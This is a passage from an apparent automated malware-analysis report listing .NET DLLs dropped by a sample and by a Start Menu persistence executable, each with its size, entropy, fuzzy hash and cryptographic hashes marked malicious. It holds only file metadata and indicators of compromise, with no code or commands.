                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
